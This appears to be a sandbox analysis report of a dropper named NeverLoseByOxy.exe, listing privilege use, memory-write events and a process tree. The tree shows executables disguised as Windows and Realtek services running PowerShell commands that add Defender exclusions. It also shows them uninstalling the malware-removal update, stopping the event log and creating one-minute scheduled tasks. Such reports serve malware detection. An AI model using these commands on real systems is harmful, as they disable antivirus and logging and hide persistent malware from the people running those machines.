description pid Process Token: SeDebugPrivilege 3428 IAStorDataMgrSvc.exe Token: SeDebugPrivilege 1032 SMSvcHost.exe Token: SeDebugPrivilege 1920 ApplicationFrameHost.exe Token: SeDebugPrivilege 1812 Realtek HD Audio Universal Service.exe Token: SeDebugPrivilege 1672 powershell.exe Token: SeDebugPrivilege 3180 powershell.exe Token: SeDebugPrivilege 3644 powershell.exe Token: SeDebugPrivilege 2056 powershell.exe Token: SeDebugPrivilege 1616 powershell.exe Token: SeDebugPrivilege 2432 powershell.exe Token: SeDebugPrivilege 2144 powershell.exe Token: SeDebugPrivilege 2764 powershell.exe Token: SeDebugPrivilege 2360 powershell.exe Token: SeDebugPrivilege 2548 taskmgr.exe Token: SeSystemProfilePrivilege 2548 taskmgr.exe Token: SeCreateGlobalPrivilege 2548 taskmgr.exe Token: SeDebugPrivilege 3316 powershell.exe Token: SeDebugPrivilege 4520 powershell.exe Token: SeDebugPrivilege 636 powershell.exe Token: SeDebugPrivilege 3416 powershell.exe Token: SeDebugPrivilege 4424 powershell.exe Token: SeDebugPrivilege 2380 svchost.exe Token: SeDebugPrivilege 3396 dialer.exe Token: SeDebugPrivilege 392 powershell.exe Token: SeDebugPrivilege 1952 powershell.exe Token: SeDebugPrivilege 1028 powershell.exe Token: SeDebugPrivilege 1500 powershell.exe Token: SeDebugPrivilege 1592 svchost.exe Token: SeDebugPrivilege 1728 dialer.exe Token: SeDebugPrivilege 3428 IAStorDataMgrSvc.exe Token: SeLockMemoryPrivilege 4276 dialer.exe Token: SeAssignPrimaryTokenPrivilege 1940 svchost.exe Token: SeIncreaseQuotaPrivilege 1940 svchost.exe Token: SeSecurityPrivilege 1940 svchost.exe Token: SeTakeOwnershipPrivilege 1940 svchost.exe Token: SeLoadDriverPrivilege 1940 svchost.exe Token: SeSystemtimePrivilege 1940 svchost.exe Token: SeBackupPrivilege 1940 svchost.exe Token: SeRestorePrivilege 1940 svchost.exe Token: SeShutdownPrivilege 1940 svchost.exe Token: SeSystemEnvironmentPrivilege 1940 svchost.exe Token: SeUndockPrivilege 1940 svchost.exe Token: SeManageVolumePrivilege 1940 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1940 svchost.exe Token: SeIncreaseQuotaPrivilege 1940 svchost.exe Token: SeSecurityPrivilege 1940 svchost.exe Token: SeTakeOwnershipPrivilege 1940 svchost.exe Token: SeLoadDriverPrivilege 1940 svchost.exe Token: SeSystemtimePrivilege 1940 svchost.exe Token: SeBackupPrivilege 1940 svchost.exe Token: SeRestorePrivilege 1940 svchost.exe Token: SeShutdownPrivilege 1940 svchost.exe Token: SeSystemEnvironmentPrivilege 1940 svchost.exe Token: SeUndockPrivilege 1940 svchost.exe Token: SeManageVolumePrivilege 1940 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1940 svchost.exe Token: SeIncreaseQuotaPrivilege 1940 svchost.exe Token: SeSecurityPrivilege 1940 svchost.exe Token: SeTakeOwnershipPrivilege 1940 svchost.exe Token: SeLoadDriverPrivilege 1940 svchost.exe Token: SeSystemtimePrivilege 1940 svchost.exe Token: SeBackupPrivilege 1940 svchost.exe Token: SeRestorePrivilege 1940 svchost.exe Token: SeShutdownPrivilege 1940 svchost.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe 2548 taskmgr.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 5284 Conhost.exe 5300 Conhost.exe -
Suspicious use of UnmapMainImage 2 IoCs
pid Process 3432 Explorer.EXE 3492 RuntimeBroker.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4824 wrote to memory of 5112 4824 NeverLoseByOxy.exe 84 PID 4824 wrote to memory of 5112 4824 NeverLoseByOxy.exe 84 PID 5112 wrote to memory of 4476 5112 LN.exe 95 PID 5112 wrote to memory of 4476 5112 LN.exe 95 PID 4476 wrote to memory of 1780 4476 cmd.exe 97 PID 4476 wrote to memory of 1780 4476 cmd.exe 97 PID 1780 wrote to memory of 4424 1780 L.exe 98 PID 1780 wrote to memory of 4424 1780 L.exe 98 PID 4424 wrote to memory of 2212 4424 temp.exe 99 PID 4424 wrote to memory of 2212 4424 temp.exe 99 PID 4424 wrote to memory of 2212 4424 temp.exe 99 PID 4424 wrote to memory of 2060 4424 temp.exe 100 PID 4424 wrote to memory of 2060 4424 temp.exe 100 PID 2060 wrote to memory of 1036 2060 cmd.exe 102 PID 2060 wrote to memory of 1036 2060 cmd.exe 102 PID 2212 wrote to memory of 4900 2212 NeverLose.exe 103 PID 2212 wrote to memory of 4900 2212 NeverLose.exe 103 PID 4900 wrote to memory of 4516 4900 expl.exe 104 PID 4900 wrote to memory of 4516 4900 expl.exe 104 PID 4900 wrote to memory of 4516 4900 expl.exe 104 PID 4516 wrote to memory of 2380 4516 exp.exe 105 PID 4516 wrote to memory of 2380 4516 exp.exe 105 PID 4516 wrote to memory of 3428 4516 exp.exe 106 PID 4516 wrote to memory of 3428 4516 exp.exe 106 PID 4516 wrote to memory of 1032 4516 exp.exe 107 PID 4516 wrote to memory of 1032 4516 exp.exe 107 PID 4516 wrote to memory of 1920 4516 exp.exe 108 PID 4516 wrote to memory of 1920 4516 exp.exe 108 PID 4516 wrote to memory of 1812 4516 exp.exe 109 PID 4516 wrote to memory of 1812 4516 exp.exe 109 PID 1032 wrote to memory of 3180 1032 SMSvcHost.exe 110 PID 1032 wrote to memory of 3180 1032 SMSvcHost.exe 110 PID 3428 wrote to memory of 1672 3428 IAStorDataMgrSvc.exe 111 PID 3428 wrote to memory of 1672 3428 IAStorDataMgrSvc.exe 111 PID 1920 wrote to memory of 3644 1920 ApplicationFrameHost.exe 114 PID 1920 wrote to memory of 3644 1920 ApplicationFrameHost.exe 114 PID 1812 wrote to memory of 2056 1812 Realtek HD Audio Universal Service.exe 116 PID 1812 wrote to memory of 2056 1812 Realtek HD Audio Universal Service.exe 116 PID 3428 wrote to memory of 1616 3428 IAStorDataMgrSvc.exe 118 PID 3428 wrote to memory of 1616 3428 IAStorDataMgrSvc.exe 118 PID 1032 wrote to memory of 2432 1032 SMSvcHost.exe 120 PID 1032 wrote to memory of 2432 1032 SMSvcHost.exe 120 PID 1920 wrote to memory of 2144 1920 ApplicationFrameHost.exe 121 PID 1920 wrote to memory of 2144 1920 ApplicationFrameHost.exe 121 PID 3428 wrote to memory of 2764 3428 IAStorDataMgrSvc.exe 124 PID 3428 wrote to memory of 2764 3428 IAStorDataMgrSvc.exe 124 PID 1812 wrote to memory of 2360 1812 Realtek HD Audio Universal Service.exe 126 PID 1812 wrote to memory of 2360 1812 Realtek HD Audio Universal Service.exe 126 PID 1032 wrote to memory of 636 1032 SMSvcHost.exe 131 PID 1032 wrote to memory of 636 1032 SMSvcHost.exe 131 PID 1920 wrote to memory of 4520 1920 ApplicationFrameHost.exe 133 PID 1920 wrote to memory of 4520 1920 ApplicationFrameHost.exe 133 PID 3428 wrote to memory of 3416 3428 IAStorDataMgrSvc.exe 135 PID 3428 wrote to memory of 3416 3428 IAStorDataMgrSvc.exe 135 PID 1812 wrote to memory of 4424 1812 Realtek HD Audio Universal Service.exe 137 PID 1812 wrote to memory of 4424 1812 Realtek HD Audio Universal Service.exe 137 PID 2380 wrote to memory of 3396 2380 svchost.exe 141 PID 2380 wrote to memory of 3396 2380 svchost.exe 141 PID 2380 wrote to memory of 3396 2380 svchost.exe 141 PID 2380 wrote to memory of 3396 2380 svchost.exe 141 PID 2380 wrote to memory of 3396 2380 svchost.exe 141 PID 2380 wrote to memory of 3396 2380 svchost.exe 141 PID 2380 wrote to memory of 3396 2380 svchost.exe 141 PID 3544 wrote to memory of 3928 3544 cmd.exe 146 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:620
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:380
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:680
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:960
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:756
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:872
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1096
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1128
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1160
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1208 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2860
-
-
C:\ProgramData\IAStorDataMgrSvc.exeC:\ProgramData\IAStorDataMgrSvc.exe2⤵
- Executes dropped EXE
PID:676
-
-
C:\ProgramData\ApplicationFrameHost.exeC:\ProgramData\ApplicationFrameHost.exe2⤵
- Executes dropped EXE
PID:6004
-
-
C:\ProgramData\Realtek HD Audio Universal Service.exe"C:\ProgramData\Realtek HD Audio Universal Service.exe"2⤵
- Executes dropped EXE
PID:6032
-
-
C:\ProgramData\SMSvcHost.exeC:\ProgramData\SMSvcHost.exe2⤵
- Executes dropped EXE
PID:6100
-
-
C:\ProgramData\IAStorDataMgrSvc.exeC:\ProgramData\IAStorDataMgrSvc.exe2⤵
- Executes dropped EXE
PID:3364
-
-
C:\ProgramData\ApplicationFrameHost.exeC:\ProgramData\ApplicationFrameHost.exe2⤵
- Executes dropped EXE
PID:5404
-
-
C:\ProgramData\Realtek HD Audio Universal Service.exe"C:\ProgramData\Realtek HD Audio Universal Service.exe"2⤵
- Executes dropped EXE
PID:5632
-
-
C:\ProgramData\SMSvcHost.exeC:\ProgramData\SMSvcHost.exe2⤵
- Executes dropped EXE
PID:5668
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1292
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1316
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1324
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1436
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1444
-
C:\Windows\system32\sihost.exesihost.exe2⤵
- Modifies registry class
PID:2644
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1564
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1580
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1660
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1700
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1732
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1772
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1820
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1932
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1968
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1976
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2044
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1940
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2108
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2216
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2364
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2508
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2516
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2660
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2736
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2768
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2796
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2824
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2832
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:3004
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2132
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3340
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of UnmapMainImage
PID:3432 -
C:\Users\Admin\AppData\Local\Temp\NeverLoseByOxy.exe"C:\Users\Admin\AppData\Local\Temp\NeverLoseByOxy.exe"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4824 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\LN.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\LN.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5112 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:4476 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\L.exeL.exe -p123567Oxy -dC:\Users\Admin\AppData\Local\Temp5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1780 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\temp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\temp.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4424 -
C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\NeverLose.exe"C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\NeverLose.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2212 -
C:\Users\Admin\AppData\Local\Temp\expl.exe"C:\Users\Admin\AppData\Local\Temp\expl.exe"8⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4900 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\exp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\exp.exe"9⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4516 -
C:\Users\Admin\AppData\Local\Temp\svchost.exe"C:\Users\Admin\AppData\Local\Temp\svchost.exe"10⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2380 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3316
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart11⤵
- Suspicious use of WriteProcessMemory
PID:3544 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart12⤵PID:3928
-
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe11⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3396
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "svchost.exe"11⤵
- Launches sc.exe
PID:3164
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "svchost.exe" binpath= "C:\ProgramData\svchost.exe" start= "auto"11⤵
- Launches sc.exe
PID:336
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog11⤵
- Launches sc.exe
PID:1200
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "svchost.exe"11⤵
- Launches sc.exe
PID:4556
-
-
-
C:\Users\Admin\AppData\Local\Temp\IAStorDataMgrSvc.exe"C:\Users\Admin\AppData\Local\Temp\IAStorDataMgrSvc.exe"10⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3428 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\IAStorDataMgrSvc.exe'11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1672
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'IAStorDataMgrSvc.exe'11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1616
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\IAStorDataMgrSvc.exe'11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2764
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'IAStorDataMgrSvc.exe'11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3416
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "IAStorDataMgrSvc" /tr "C:\ProgramData\IAStorDataMgrSvc.exe"11⤵
- Scheduled Task/Job: Scheduled Task
PID:4544
-
-
-
C:\Users\Admin\AppData\Local\Temp\SMSvcHost.exe"C:\Users\Admin\AppData\Local\Temp\SMSvcHost.exe"10⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1032 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SMSvcHost.exe'11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3180
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SMSvcHost.exe'11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2432
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\SMSvcHost.exe'11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:636
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SMSvcHost.exe'11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1952
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SMSvcHost" /tr "C:\ProgramData\SMSvcHost.exe"11⤵
- Scheduled Task/Job: Scheduled Task
PID:5388 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:5468
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ApplicationFrameHost.exe"C:\Users\Admin\AppData\Local\Temp\ApplicationFrameHost.exe"10⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1920 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ApplicationFrameHost.exe'11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3644
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ApplicationFrameHost.exe'11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2144
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\ApplicationFrameHost.exe'11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4520
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ApplicationFrameHost.exe'11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1028
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "ApplicationFrameHost" /tr "C:\ProgramData\ApplicationFrameHost.exe"11⤵
- Scheduled Task/Job: Scheduled Task
PID:5236 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵
- Suspicious use of SetWindowsHookEx
PID:5284
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Realtek HD Audio Universal Service.exe"C:\Users\Admin\AppData\Local\Temp\Realtek HD Audio Universal Service.exe"10⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1812 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Realtek HD Audio Universal Service.exe'11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2056
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Realtek HD Audio Universal Service.exe'11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2360
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Realtek HD Audio Universal Service.exe'11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4424
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Realtek HD Audio Universal Service.exe'11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1500
-
-
